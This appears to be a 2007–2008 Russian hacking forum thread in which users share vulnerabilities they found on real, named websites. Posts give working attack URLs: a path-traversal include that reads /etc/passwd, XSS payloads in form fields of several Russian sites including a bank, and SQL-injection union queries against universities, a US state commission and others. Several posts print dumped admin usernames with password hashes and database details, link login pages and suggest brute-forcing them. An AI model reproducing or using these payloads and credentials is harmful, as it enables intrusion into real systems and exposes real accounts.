Уязвимости найденные вами Хак! Ломать не строить - это уметь надо


Версия для печати темы

Нажмите сюда для просмотра этой темы в оригинальном формате

Твой софтовый форум Хак! Ломать не строить - это уметь надо Уязвимости найденные вами

Автор: de1ay 13.06.2007 - 21:25

Начну я. smile.gif
Инклюд для начала.

QUOTE
http://ai.isi.edu/index.php?module=seminars/index&submodule=../../../../../etc/passwd

Автор: zombie18 16.06.2007 - 9:30

ну вот xss докучи...

QUOTE
http://www.transtech.ru/Anketa/anketa1.htm

в поле Ф.И.О. вписываем
CODE
"><script>alert(/xss/)</script>

+1
QUOTE
http://www.regent.ru/about/graduates.html

помоему в любое поле вообще... такую же байду:
CODE
"><script>alert(/xss/)</script>

+1
QUOTE
http://www.vms.ru/pages/atketa.php

тоже куда хошь... ниче не фильтруется...
CODE
"><script>alert(/xss/)</script>

+1
QUOTE
http://www.osp.ru/

в поиске пишем:
CODE
"><script>alert(/xss/)</script>

+1
вот тебе и юниаструм банк (^_~)
QUOTE
http://www.uniastrum.ru/ru/ml_form/

в поле Фамилия, Имя, Отчество: тот же баг у всех на ">
CODE
"><body onLoad=alert('xss')>

+1
QUOTE
http://intv.ru/

при регистрации поле "ник" не фильтруется, можно написаль там к примеру:
CODE
"><script>alert('xss')</script>

чтобы посмотреть пример залогиньтесь с

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |


+1
QUOTE
http://www.klerk.ru/subscribe/register.php

уязвимо поле e-mail. пример использования:
CODE
http://www.klerk.ru/subscribe/register.php?email=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

Автор: de1ay 29.07.2007 - 21:18

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |

Автор: de1ay 7.08.2007 - 18:33

LZA Terminologijas komisija
Один из местных универов.

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |

Автор: de1ay 21.08.2007 - 18:17

Big6: Information Skills for Student Achievement

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |

Автор: ZaHack 21.08.2007 - 20:37

Не совсем по теме (тут больше веб-уязвимости), но все же:
Переполнение буфера обмена программы helpctr.exe
Уязвимые ОС: Win XP
При вводе в IE строки:

Code
hcp://w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.


происходит запуск самой программы helpctr.exe Это происходит из-за возникновения в приложении исключения (которое вызывается удаленно из браузера)

PS Практического применения эта уязвимость, конечно, не имеет, но наглядно показывает "надежность" продуктов от M$

PPS Работает не на всех компьютерах.

Автор: de1ay 21.08.2007 - 23:10

Цитата | Quote(ZaHack @ 21.08.2007 - 20:34)
PS Практического применения эта уязвимость, конечно, не имеет, но наглядно показывает "надежность" продуктов от M$
*


А почему нет? Переполненяем буфер, передаём управление шелл-коду... Все. smile.gif

Автор: de1ay 28.08.2007 - 19:03

Code
http://www.varmint.org/ishop/index.php?GID=-1+union+select+1,2,version(),4,5,6,7,8,9,1,2/*

Таблицы лень подбирать... smile.gif

Автор: de1ay 28.08.2007 - 19:17

ГОРОДСКОЙ ЭЛЕКТРОТРАНСПОРТ
совмещённый трамвайно-троллейбусный сайт

Code
http://stts.mosfont.ru/articles.php?gid=-1+union+select+1,table_name+from+information_schema.tables+limit+0,1/*

Автор: de1ay 28.08.2007 - 20:09

www.crim.ncsu.edu
Center for Robotics and Intelligent Machines

Достаем логин и хеш:

Code
http://www.crim.ncsu.edu/project_detailed.php?id=-1+union+select+1,2,3,concat(user_login,0x3a,user_pass),5,6,7,8,9,1,2,3,4,5,6,7,8+from+wp_users+limit+0,1/*

admin:75bb40f591c0db371aba50f65741d73f

Можно сбрутить... Логинимся тут:
http://www.crim.ncsu.edu/login.php

Статическая инфа:
Версия: 5.0.19-max-log
Пользователь: wp_crim@engr06ws.eos.ncsu.edu
База: wp_crim

Автор: de1ay 18.09.2007 - 7:21

VLG - Veterinary Leadership Group

Code
http://www.vlg.us/users_info.php?user=-1+union+select+1,2,3,4,5,6,7,8,concat(adm_username,0x3a,adm_password),1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,
6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5+from+cms_admin+limit+0,1/*


csos:2d7784bc6d2ee4d098ba1a941b8aeff6
jackrife:8c7516e35cc1316c549d2e0a6be7c3f4

http://www.vlg.us/login.php

Автор: de1ay 27.09.2007 - 18:07

University of Chicago Experts Guide

Code
http://experts.uchicago.edu/experts.php?id=31+union+select+1,concat(user,0x3a,password),3,4,5,6,7,9,1,2,3,4,5,6,7, 8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,3+from+mysql.user+limit+1,1/*


root:0bd914e54597ba5d
tim:6203790e5a8f045f
www:688190236b17cea9
rlvoyer:3ccc14724f83db34
---

Автор: de1ay 7.11.2007 - 10:17

Проверка, настройка партнерских программ

Code
http://se-t.net/stat.php?from=0&pid=841+union+select+1 ,2,login,email,passwd+from+users/*


Логин\Пароль\Email

Автор: de1ay 7.04.2008 - 15:03

Maine Commission for Community Service

Code
http://www.maineservicecommission.gov/MVF/article.php?ID=363+union+select+1,2,concat_ws
(0x3a,version(),database(),user()),4,5,6,7,8,9,1,2,3,4/*

4.1.20 : m41n3s3r_ : m41n3s3r_v0lunt3@localhost


  Яндекс цитирование   Rambler's Top100